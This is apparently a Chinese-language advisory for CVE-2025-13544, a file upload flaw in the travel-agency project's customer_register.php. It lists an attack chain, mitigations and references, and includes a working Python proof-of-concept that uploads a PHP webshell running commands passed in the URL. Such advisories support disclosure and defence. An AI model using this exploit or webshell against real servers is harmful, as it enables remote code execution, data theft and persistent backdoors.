CVE-2025-13544 ashraf-kabir travel-agency任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-13544

漏洞类型

任意文件上传

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ashraf-kabir travel-agency

漏洞概述

CVE-2025-13544是ashraf-kabir travel-agency项目中的一个高危安全漏洞，存在于customer_register.php文件中。该漏洞允许攻击者通过操纵文件上传功能，上传任意类型的恶意文件到服务器，从而可能导致远程代码执行、敏感数据泄露或服务器被完全控制。由于该漏洞利用难度较低且已有公开的利用代码，强烈建议立即采取防护措施。攻击者可利用此漏洞绕过正常的文件类型验证，上传PHP、Webshell或其他恶意脚本文件，进而在服务器上执行任意命令。该漏洞影响项目的1f25aa03544bc5fb7a9e846f8a7879cecdb0cad3及之前版本。

技术细节

该漏洞存在于ashraf-kabir travel-agency的customer_register.php文件中，攻击者可以通过构造恶意请求利用文件上传功能。具体来说，漏洞源于程序对用户上传的文件缺乏充分的验证和过滤，攻击者可以绕过文件类型检查，上传包含恶意代码的文件（如PHP脚本）。攻击者首先访问customer_register.php页面，然后通过修改HTTP请求中的文件类型参数或直接构造恶意文件内容，实现任意文件上传。上传成功后，攻击者可以通过访问上传的文件路径来执行其中的恶意代码，从而实现远程代码执行。攻击者还可以利用Webshell建立持久化访问通道，进一步渗透内网系统。该漏洞的CVSS评分为6.3（中等严重性），攻击向量为网络，认证要求为低权限，无需用户交互即可完成攻击。

攻击链分析

STEP 1

步骤1

攻击者访问目标网站的customer_register.php注册页面

STEP 2

步骤2

攻击者构造包含恶意PHP代码的文件（如Webshell）

STEP 3

步骤3

攻击者绕过文件类型验证，通过修改Content-Type或构造特殊文件名上传恶意文件

STEP 4

步骤4

服务器将恶意文件保存到可访问目录（如/uploads/）

STEP 5

步骤5

攻击者访问上传的恶意文件并执行其中的代码，获得服务器远程控制权限

STEP 6

步骤6

攻击者利用获得的权限进行内网渗透、数据窃取或部署持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13544 PoC - ashraf-kabir travel-agency Unrestricted File Upload
# Target: /customer_register.php

def exploit(target_url, file_path='shell.php'):
    """
    Exploit unrestricted file upload vulnerability in customer_register.php
    """
    upload_url = f"{target_url}/customer_register.php"
    
    # Prepare malicious PHP file
    php_shell = '<?php system($_GET["cmd"]); ?>'  # Simple webshell
    
    # Prepare multipart form data
    files = {
        'file': (file_path, php_shell, 'application/x-php')
    }
    
    data = {
        'submit': 'Register'
    }
    
    try:
        # Send malicious upload request
        response = requests.post(upload_url, files=files, data=data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] File upload request sent to {upload_url}")
            print(f"[+] Check if shell was uploaded at: {target_url}/uploads/{file_path}")
            print(f"[+] Execute command: {target_url}/uploads/{file_path}?cmd=whoami")
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/travel-agency")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit(target)

影响范围

ashraf-kabir travel-agency <= 1f25aa03544bc5fb7a9e846f8a7879cecdb0cad3

防御指南

临时缓解措施

立即限制customer_register.php的上传功能或暂时下线相关页面。在Web应用防火墙（WAF）上配置规则，拦截异常的文件上传请求。对上传目录设置严格的访问权限，确保上传的文件无法直接执行。部署入侵检测系统监控异常的文件上传和访问行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13544
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13544
3 Details https://www.cvedetails.com/cve/CVE-2025-13544/
4 VulDB https://vuldb.com/cve/CVE-2025-13544
5 Link https://github.com/www223-ai/CVE/blob/main/travel-File%20Upload.docx
6 Link https://vuldb.com/?ctiid.333311
7 Link https://vuldb.com/?id.333311
8 Link https://vuldb.com/?submit.690975
9 Link https://github.com/www223-ai/CVE/blob/main/travel-File%20Upload.docx